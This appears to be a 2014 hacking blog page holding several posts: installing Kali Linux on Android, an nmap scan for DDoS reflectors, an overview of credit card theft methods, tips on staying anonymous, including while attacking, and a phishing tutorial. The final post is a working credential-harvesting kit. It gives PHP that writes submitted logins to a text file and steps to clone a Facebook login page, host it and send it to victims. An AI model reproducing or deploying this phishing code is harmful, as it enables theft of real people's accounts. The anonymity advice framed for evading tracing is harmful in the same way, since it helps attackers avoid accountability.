Saturday 27 September 2014

The way to run KALI LINUX on android without rooting.

 http://www.kali.org/wp-content/uploads/2013/09/galaxy-s4-kali-linux.jpg
The very first step to this project is to have an Android phone running OS 4.1 +, although I have read that android 2.1+ is sufficient, I have used a Samsung Note 3 with the latest kitkat OS. It does not need to be rooted. Yes you heard me right, not root required.

Moving on, we have to remember that the majority of the android phones available now in the market are not 64 bit supportive they are all meant for 32 bit OS. hence, the OS needs to be 32 bit. period.

We begin by downloading the appropriate ISO image from the official kali linux website which you can find here- http://www.kali.org/downloads/ please make sure you download the 32 bit version which states Kali Linux 1.0.6 32 Bit Mini ISO as shown below-

Next, we need a PC emulator for Android and we choose to install the limbo PC emulator, it is interesting to note that it has been removed from Google play store so you will have to search for other alternatives like sourceforge. Once downloaded and installed on your mobile device, you are ready for the real deal.

Run the Limbo PC emulator on your mobile device, and configure it with the following parameters as shown in the figures below-





Make sure that the mini ISO image of Kali linux is saved/copied onto the Mobile device. And point the ISO image under CDROM option.



You will also need to allocate space for hard disk, this will be a collective figure and it will be split  into swap and primary storage later. Select the Network configuration to be ?User? to use the default card/settings on the mobile device. Set Boot from device to be default so post installation, it will automatically boot from the hard disk.

No changes to the Advanced configuration.





?Start? the emulator and you will see the installation window





The easiest way to proceed would be the auto install but, I suggest manual install.







Sometimes it could be an issue with finding the right mirror for the download but, trial and error always wins. (For latest mirror links refer official Kali website)





But in most cases, with the auto install, it will find the nearest available mirror and download the packages.

Packages being downloaded

Setting up the root account



Installation continues..





starting up the partitioner..

Guided partitioning..





Auto allocation of disk space, it allots swap and ext automatically but, you can manually change that as well.



Writing the partitions





Quick glance at the installer menu?





Almost there..





Congrats you now have kali linux on your android phone.

A couple of things to note:

1. You might face issues with installing additional software packages but, don?t be perturbed, remember you can skip them and install them individually post installation.

2. Once installation is completed, if the machine does not automatically boot, go to your machine in limbo PC emulator and point the boot device to Hard disk.

3. If you face boot loader issues, you can skip it and manually fix it at a later stage

4. For additional troubleshooting, try to tweak the CPU settings, allocated RAM, etc.

Saturday 20 September 2014

 How to use nmap to scan for DDOS reflectors



Before we get into this here is the standard disclaimer. Do not scan any devices that you do not have explicit permission to scan. If you do not own the devices I strongly recommend you get that permission in writing. Also, port scanning may cause instability or failure of some devices and/or applications. Just ask anyone who lost ILOs to heartbleed. So be careful!

As we have seen in past diaries about reflective DDOS attacks they are certainly the flavor of the day. US-CERT claims there are several UDP based protocols that are potential attack vectors. In my experience the most prevalent ones are DNS, NTP, SNMP, and CharGEN. Assuming you have permission; Is there an easy way to do good data gathering for these ports on your network? Yes, as a matter of a fact it can be done in one simple nmap command.




nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr <target>


Let’s break this down:

-sU –perform a UDP scan. Since all the services above are UDP I only need to scan for the UDP ports.

-A -perform operating system and application version detection. This will attempt to give you more information about what applications are running on the open ports. The -A option also includes operating system detection, but it is unlikely that operating system detection will work when scanning this few ports.

-PN –scan even if you can’t contact the IP. By default nmap will not scan any device it can’t contact. Unfortunately if a device is hidden behind a firewall nmap will not usually be able to detect the device and will omit it from the detailed scan. A downside of using –PN is that nmap will complete the detailed scan against the IP even if it doesn’t exist or no ports are open. If you are scanning a large number of IPs the scan will take a long time.

-n –don’t do a DNS resolution. By default nmap performs a DNS resolution. Not doing that resolution will speed up the scan somewhat.

-pU:19,53,123,161 –scan UDP ports specified. In nmap ‘–p’ is used to indicate which ports to scan. The ‘U’ tells nmap that the ports that follow are UDP ports. Since this scan is only scanning UDP ports (–sU) the ‘U’ is redundant. However over the years I have gotten into the habit of explicitly specifying which type of ports I want to scan unless I want to add some TCP ports (-pT:) to the scan at a later time.

The ports specified in this scan are:

19 – CharGEN
53 – DNS
123 – NTP
161 - SNMP

–script=ntp-monlist,dns-recursion,snmp-sysdescr – the –script= option enables the nmap scripting engine (NSE) and runs scripts when they make sense to run. In other words, the ntp-monlist script will only be run when the NTP port is found to be open. nmap has many scripts available which can be used to extend nmaps basic functionality.

The scripts specified on this scan are:

ntp-monlist – while any open NTP service can be used in a reflective DDOS attack the maximum amplification is achieved with NTP services that permit the monlist command to be executed. This script will do a check to see if monlist can be executed against an open NTP port.
Normally an open NTP service will look similar to:

123/udp open ntp NTP v4

If the monlist command is enabled on the ntp server, the ntp-monlist script will give you more information:

123/udp open ntp NTP v4

| ntp-monlist:

| Target is synchronised with 206.108.0.131

| Alternative Target Interfaces:

| XXX.16.1.71 

| Public Servers (4)

| XXX.87.64.125 XXX.75.12.11 XXX.108.0.131

| Other Associations (596)

…etc…

dns-recursion – Normally public DNS servers will only answer DNS queries for which they are authoritative. A DNS server that permits and processes queries for names it is not authoritative are called recursive DNS servers and recursive DNS servers in most cases are misconfigured. The output for an open DNS port with recursion enabled will be similar to :

53/udp open domain Microsoft DNS 6.1.7600 (1DB04228)

| dns-nsid:

|_ bind.version: Microsoft DNS 6.1.7600 (1DB04228)

|_dns-recursion: Recursion appears to be enabled

snmp-sysdescr – attempts to extract more information from the SNMP service. An open SNMP service will look similar to:

161/udp open snmp SNMPv1 server (public)

With the snmp-sysdescr script it will usually display more information which may tell you more about the device you are scanning:

161/udp open|filtered snmp

|_snmp-hh3c-logins: TIMEOUT

|_snmp-win32-shares: TIMEOUT

Or

161/udp open snmp SNMPv1 server (public)

| snmp-sysdescr: Apple AirPort - Apple Inc., 2006-2012. All rights Reserved.

|_ System uptime: 9 days, 20:15:36.56 (85053656 timeticks)

Want to take a guess at what these devices are?

As you can see nmap provides a simple and effective way of scanning for the common ports used in reflective DDOS attacks. This diary has barely scratched the surface of nmap’s capabilities.

How Hacker's Hack Credit Card and It's Information

How Hacker's Hack Credit Card and It's Information

A hacker has many ways to gain a credit card number from an innocent user.

The most common one is known as phishing. In this technique, the hacker poses as an officer within an organization, let's say VISA.

The hacker sends to a group of email accounts an alert, instructing the receiver to follow determined set of instructions before his credit card is cancelled.



If the user is not aware of this kind of fraud, he will insert his credit card number, his name and expiration date without knowing he is going to be a victim of an online crime.

Another way for hacking credit card numbers is through a website. The hacker only needs to hack the systems of an online retailer, let's say, Costco, and search for the database where the retailer stores the
information of all of the users who have made recent transactions.

The third way is through the online process of buying. Let's say an adult finds a website with adult content that he or she finds attractive. It's quite probable that the website is only a masquerade for acquiring credit card information from you.


What Is A Carder?
A carder is a criminal who specializes in stealing information from credit cards. Although the majority of them buy the information from online vendors, some of them are quite savvy on how to access that information
by themselves.



In the physical world, a carder will steal the information from a user while doing a face to face transaction. The criminal only needs to pass the card through a special scanner.

This device will read from the magnetic strip all of the credit card information. Afterwards, the carder will trespass that information to a blank card available in many identity card stores.

In the virtual world, credit card hacking is a bit more sophisticated and automatized.

A hacker could install inside your system a credit card hacking software known as Bugbear. This program is a keystroke logger; it captures the keys that you have pressed in your keyboard and after some time, it transmits this information to the hacker. The criminal will navigate through this data, searching for any private information that can give him access to your credit card.



Besides Bugbear, there is also the IRC bot. This automated software is used for determined functions, like a moderator for a chat room.

But if it is used by a hacker, he may use it for stealing your credit card information. The IRC bot will pose as an official from a company, asking you to insert your credit card information.

Another mean that hackers use for stealing money from your credit card is through unused ebay accounts.
Once they find a possible victim, the hacker uses a program that starts bombarding the account until it breaks it. Once inside, the hacker will use it for posing as the real user, selling equipment that will never reach the buyer once he buys it.

4 Ways To Be Anonymous Online

4 Ways To Be Anonymous Online

Want to be anonymous online to view blocked websites, protect your self from hackers or want to hack some one and stay un-traced?. In the following post i will explain 4 easy ways by which you can stay anonymous online!

----------------------------------

1. Using Proxies

A proxy is an address ( IP address ) of a Server (proxy server) that is placed between your computer and the Internet The advantage of a proxy is that your real IP address is Hidden so when you hack your giving the IP address of the proxy sever and not your real IP address Same way if your a normal Internet user the hacker won't get your real IP but the IP of the proxy server.You can use it to enter site or forum that you are IP is banned. To know more about proxies les me know above this post and I will post a full tutotial about it.



2. Using Tor

Tor-proxy is a free proxy-server service that Internet users can use to hide their IP address while surfing the Web. Tor (The Onion Router) is free software for enabling online anonymity. Tor directs Internet traffic through a free, worldwide volunteer network consisting of more than three thousand relays to conceal a user's location or usage from anyone. I have written a complete How to guide on how to use tor - just let me know if you need it



3. SSH Tunneling

SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel.In easy language,you can surf net without being monitored and even surf blocked sites too. To know more about SSH and SSH tunneling let me know if you would like to read: SSH tunneling guide.



4. Using VPN

Virtual Private Network. Basically it’s a private network which lets users to connect to other users or remote sites using a public network usually internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short, it is private network constructed within a public network infrastructure, such as the global Internet. The Biggest difference between proxy and VPN is everything in a VPN is encrypted which gives an additional layer of security.



Stay Anonymous..................

MAKE PHISHING PAGE FOR ANY WEBSITE & HOW TO HACK ACCOUNTS ? by Manoj Ahuja

MAKE PHISHING PAGE FOR ANY WEBSITE & HOW TO HACK ACCOUNTS ? 









1. First Open the website of whichyou want to make phisher/ fake loginpageEg : Facebook.com
2. Now do right click and save the page.
3. Open the page in notepad, Now search for "action = http://" and change following address to login.php
4. After editing save the page as"index.html"
5. Now its time to create login.php.Open notepad and copy/paste thisbelow code and save it as login.php :header
('Location: http://yahoo.com/ ');
$handle = fopen("log.txt", "a");foreach($_POST as $variable =>$value) {fwrite($handle,$variable);
fwrite($handle,"=");
fwrite($handle,$value);
fwrite($handle,"\r\n");
}
fwrite($handle,"\r\n");
fclose($handle);
exit;?>
6. Now create a simple and empty text file in notepad and save it aslog.txt
7. Now create your own free web hosting account and upload all the three files.
8. Upload Index.html , login.php ,log.txt we created in above steps...
9. We are done, our phisher / fake login page is ready.
How to Hack Accounts ?
Send the index.html free hosting account link to the victim , once he/she will enter the information and do login with our fake login page then every thing will be stored in log.txt, we can now open log.txt to see all the login details its very simple to create phisher of any website in the world, Here I have taken the example of Facebook phisher . But in this same you can also create the phisher of many websites like yahoo, gmail, orkut,msn, paypal etc...
 


Note : This tutorial is for study purpose only.